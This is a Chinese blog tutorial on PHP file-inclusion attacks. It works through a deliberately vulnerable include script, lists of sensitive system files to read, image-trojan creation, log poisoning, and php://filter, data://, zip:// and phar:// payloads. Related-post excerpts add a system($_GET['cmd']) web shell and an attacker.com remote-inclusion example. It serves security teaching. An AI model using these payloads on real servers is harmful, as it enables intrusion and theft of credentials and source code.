文件包含漏洞利用

最新推荐文章于 2024-03-22 17:00:00 发布
最新推荐文章于 2024-03-22 17:00:00 发布
阅读量5.4k 收藏 3
点赞数 2
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/supermeatboy223/article/details/123181447
版权

文件包含原理

文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞在PHP WebApplication中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计的弊端。在PHP中经常出现文件包含漏洞,但并不意味着其他语言不存在。

文件包含函数

include():找不到被包含文件时会产生警告(E_WARNING);

include_once():与include ()类似,代码已经被包含则不会再次包含require():找不到被包含的文件时会产生致命错误(E_COMPILE_ERROR)

require_once(): 与require ()类似,代码已经被包含则不会再次包含

利用条件

(1 ) include等函数通过动态执行变量的方式引入需要包含的文件

(2)用户能控制该动态变量

文件包含分类

文件包含漏洞可以分为LFI (Local File Inclusion,本地文件包含)和RFI
(Remote File Inclusion,远程文件包含)两种。而区分二者最简单的办法就是通过查看php.ini中是否开启了allow_url_include。如果开启就有可能包含远程文件。
远程文件包含需要php.ini中allow_url_include=on,allow_url_fopen = On。在php.ini中,allow_url_fopen默认一直是On,而allow_url_include从php5.2之后就默认为Off。

PHP本地文件包含 

编写文件包含的函数

<?php
if(isset($_GET['page'])){
	include $_GET['page'];
	echo "<h1 style='color:blue'>hello world</h1>";
}
else{
	print "please input page!";
}
?>

编写phpinfo 放在同一目录下

修改1116.php后缀名为txt,jpg发现都可以解析 只要文件内容符合PHP语法规范,任何扩展名都可以被PHP解析

 远程文件包含

 

读取敏感文件
http://127.0.0.1/include/03/index.php?page=C:\windows-version.txt

Windows系统敏感信息:
C:\boot.ini       //查看系统版本
C:\windows\system32\inetsrv\MetaBase.xml        //IIS配置文件
C:\windows\repair\sam                //windows初次安装的密码
C:\program Files\mysql\my.ini        //Mysql配置信息
C:\program Files\mysql\data\mysql\user.MYD        //Mysql root
C:\windows\php.ini        //php配置信息

Linux系统敏感信息:
/etc/passwd                //linux用户信息
/usr/local/app/apache2/conf/httpd.conf                //apache2配置文件
/usr/local/app/php5/lib/php.ini                //php配置文件
/etc/httpd/conf/httpd.conf                //apache配置文件
/etc/my.cnf                //Mysql配置文件

本地包含配合图片马

制作图片马 cmd命令 copy 1.jpg/b + 1.php/a 2.jpg

 包含apache日志文件

日志默认路径Apache
Apache + Linux日志默认路径
/etc/httpd/logs/access_log或 /var/log/httpd/access log

Apache + Windows日志默认路径
XAMPP套件: xampplapache\logs/access.log                                                                      phpStudy套件:phpStudy\Apache\logs/access.log

IIS
1IS6默认日志文件位置
C:WINDOWS\system32\Logfiles
IIS7默认日志文件位置
%SystemDrive%\inetpub\logs\LogFiles

Nginx
nginx日志文件在用户安装目录的logs目录下
如安装目录为/usr/local/nginx,则日志目录就是在/usr/local/nginx/logs里
也可通过其配置文件nginx.conf,获取到日志的存在路径
(/opt/nginx/logs/access.og)
 

首次尝试访问时 将payload作为参数上传因为服务器没有对应文件 会以日志的形式将payload存在日志文件中,第二次通过包含日志文件 就可以将存于日志文件中的payload解析 

 因为不存在 报错

第二次访问日志文件

 

成功解析

 

 php流input: .
利用php中流的概念,将原本的include的文件流重定向到了用户可控制的输入流中
命令执行(allow_ url_ include:on, allow_url_fopen不做要求)

 


php流filter:
读取文件(allow_ url_ include和allow_url_fopen都不做要求)
?page=php://filter/read=convert.base64-encode/resource=index.php
通过指定末尾的文件,可以读取经base64编码后的文件源码,之后再base64解码- -下
就行。虽然不能直接获取到shelll等,但能读取敏感文件危害也是挺大的。
 ?page=php://filter/convert.base64-encode/resource=index.php

效果和上面的一样不过没有read的关键字 

zip://实验

?page= zip://C:/Users/40454/Desktop/test.jpg%23test.txt
先将要执行的PHP代码写好文件名为test.txt,将test.txt进 行zip压缩,压缩文件名为
test.zip,如果可以上传zip文件便直接.上传,若不能便将test.zip重命名为test.jpg后再上传。

data://

命令执行(php版本大于等于5.2,allow_ url_ include和allow_ url_fopen都为on的状态)
?page=data://text/plain, <?php phpinfo();?>
?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

phar://

假如有个文件test.txt,打包成zip压缩包,指定绝对路径(或者使用相对路径)
?page= phar://C:/Users/40454/Desktop/test.zip/test.txt或
?page= phar://C:/Users/40454/Desktop/test.jpg/test.txt
 和zip协议类似 可以访问压缩包

伪协议用法小结

 

supermeatboy223
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
关于Apache Tomcat存在文件包含漏洞的整改方法
01-09
安全公告编号:CNTA-2020-0004 2020年1月6日,国家信息安全漏洞共享平台(CNVD)收录了由北京长亭科技有限公司发现并报送的Apache Tomcat文件包含漏洞(CNVD-2020-10487,对应CVE-2020-1938)。攻击者利用该漏洞,可在未授权的情况下远程读取特定目录下的任意文件。目前,漏洞细节尚未公开,厂商已发布新版本完成漏洞修复。 一、漏洞情况分析 Tomcat是Apache软件基金会Jakarta 项目中的一个核心项目,作为目前比较流行的Web应用服务器,深受Java爱好者的喜爱,并得到了部分软件开发商的认可。Tomcat服务器是一个免费的开放源代码的Web
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。
什么是文件包含漏洞?文件包含漏洞利用方法及防御技巧
2201_75362610的博客
03-22 1569
例如,攻击者可以将 _GET[‘url’]的值,那么他们就可以在目标系统上从任意URL获取内容。例如,攻击者可以将 G​ET[′url′]的值,那么他们就可以在目标系统上从任意URL获取内容。例如,攻击者可以将_GET[‘url’]的值设置为“http://attacker.com/恶意代码.php”,这样就可以在目标系统上执行恶意代码。例如,攻击者可以将 G​ET[′file′]的值,那么他们就可以在目标系统上包含任意文件。如果攻击者能够控制包含的文件的内容,那么他们就可以在目标系统上执行任意代码。
toxin:LFI(本地文件包含漏洞利用工具
05-30
毒素 Toxin 是一个 LFI(本地文件包含)/日志污染利用工具。 介绍 Toxin 利用特定(但也是常见)类型的本地文件包含 (LFI) 漏洞,攻击者可以利用该漏洞利用 PHP 的register_globals设置。 在这种攻击场景中,攻击者会制作一个自定义的User-Agent标头,其中包含任意 PHP 代码,这些代码将向环境注册一个新的全局变量,如下所示: <?php system ( $ _GET [ 'cmd' ]); ?> 注册新的恶意全局变量后,我们可以将其添加到 URL 中的查询字符串中,该 URL 包含目标主机上容易被包含的文件,然后使用该文件和查询字符串执行任意系统级命令,像这样: http://target.tld/info.php?page=../../../../../var/log/apache/access.log&cmd=whoami 有许多
文件包含漏洞——实例
weixin_54055099的博客
09-24 2871
文件包含漏洞的实例
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 5万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
文件包含漏洞全解
2301_78287784的博客
06-15 865
以上就是文件包含漏洞所有的内容,通过以上的介绍,我们可以看出文件包含漏洞利用难度,也可以根据他的原理提出修复建议:1、可以限制用户访问文件的权限;2、include函数中的参数用户是否可控,如果可控,则要限制;3、增加过滤,对用户输入的敏感参数进行过滤;4、配置文件中不必要开的参数设置为OFF等等,希望本文能对你有所帮助,星光安全面向基础。
文件包含漏洞-利用方式
Echo__h的博客
04-26 448
session文件通常保存在temp目录下,文件名格式通常为sess_xxxxx(session id),找到一个可以写入session的点即可利用文件包含漏洞。无法上传php文件时,如果存在文件包含,可以上传符合服务器要求的文件,在文件中写入恶意代码,然后再包含以执行。因此可以将一句话木马写入日志文件,再包含日志文件执行木马。网站存在漏洞但没有合适的上传点时,可以尝试包含日志文件(mysql/ssh/apache等)2)通过burp抓包可以发现,‘
文件包含漏洞
qz362228的博客
04-23 994
文章目录前言一、文件包含漏洞原理二、利用方式三、常用的防御方式四、绕过方式LFI漏洞利用技巧1.字符串截断--00截断2.配合文件上传总结 前言 一、文件包含漏洞原理 原理: 在通过PHP的相应函数(如:include())引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 (这可能有点难理解,那我们先来了解一下包含的概念,进而理解此原理) 1.什么是文件包含文件包含就是把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用
文件包含漏洞之——防御措施
wsnbbz的博客
03-04 3764
设置白名单 代码在进行文件包含时,如果文件名可以确定,可以设置白名单对传入的参数进行比较。 过滤危险字符 由于Include/Require可以对PHP Wrapper形式的地址进行包含执行(需要配置php.ini),在Linux环境中可以通过”…/…/”的形式进行目录绕过,所以需要判断文件名称是否为合法的PHP文件。 设置文件目录(配置php.ini) PHP配置文件中有open_basedir...
60-60.渗透测试-文件包含漏洞挖掘与利用.mp4
最新发布
05-10
60-60.渗透测试-文件包含漏洞挖掘与利用.mp4
文件包含漏洞一览
Amire0x的小乐园
11-08 460
文件包含 原因 文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。 php的文件包含相关函数都是无论其参数的扩展名是什么,都会将其内 容作为php代码解析,这可能就会造成任意的php代码执行。 如果一个功能需要包含用户传来的参数时,且开发者又没有对用户的输入进行检测和过滤,那么就 很可能使攻击者利用该功能进行文件包含漏洞的攻击。 相关函数 引起该漏洞的通常是 include() include() 如果出错的话,只会提出警告,会继续执行后
文件包含漏洞详解
剁椒鱼头没剁椒的博客
12-01 3945
文件包含漏洞就是使用函数去包含任意文件的时候,当包含的文件来源过滤不严谨的时候,当存在包含恶意文件后,就可以通过这个恶意的文件来达到相应的目的。file : // #访问本地文件系统 http : // #访问HTTPs网址 ftp : // #访问ftp URL php : // #访问输入输出流 zlib : // #压缩流 data : // #数据 ssh2 : // #security shell2 expect : // #处理交互式的流 glob : // #查找匹配的文件路径。
利用文件包含漏洞-getshell
LJH1999ZN的博客
02-22 7105
一、什么是文件包含漏洞 文件包含是指应用程序没有对引用的文件做合理的校验,导致包含的文件中含有恶意的代码,并且执行了该代码。从而产生了文件包含漏洞 二、文件包含漏洞的利用条件 1.引用一个任意类型的文件 2.程序读取文件并且执行 三、将木马程序放入某个本地文件中。 1.利用网站报错日志写入木马程序 2.利用文件上传功能,上传含有木马的任意文件 四、文件包含getshell 1.本地文件包含getshell 网站会将一些错误信息记录到日志文件中,我们可以利用这个特性将木马写入日志文件中去
dvwa文件包含漏洞利用
07-28
DVWA文件包含漏洞利用是指利用DVWA(Damn Vulnerable Web Application)中存在的文件包含漏洞进行攻击。文件包含漏洞是一种常见的安全漏洞,它允许攻击者通过构造恶意请求来包含并执行服务器上的任意文件。 在DVWA中,可以使用包含漏洞来访问系统中的敏感文件、执行恶意代码或者获取系统权限。攻击者可以通过构造特定的请求,利用DVWA中的文件包含漏洞来获取敏感信息或者执行任意代码。 为了利用DVWA中的文件包含漏洞,攻击者通常会使用一些常见的函数,如php中的include()、include_once()、require()、require_once()等。通过构造恶意的文件路径,攻击者可以让服务器加载并执行恶意文件。 因此,为了防止文件包含漏洞的利用,开发人员应该在编写代码时注意对用户输入进行过滤和验证,避免将用户输入直接用于文件包含函数中的参数。同时,及时更新和修补系统和应用程序的漏洞也是非常重要的。 #### 引用[.reference_title] - *1* *2* *3* [DVWA之包含漏洞(file Inclusion)——文件包含漏洞产生的原因、文件包含漏洞的利用方式、DVWA之包含漏洞...](https://blog.csdn.net/weixin_45116657/article/details/100602769)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值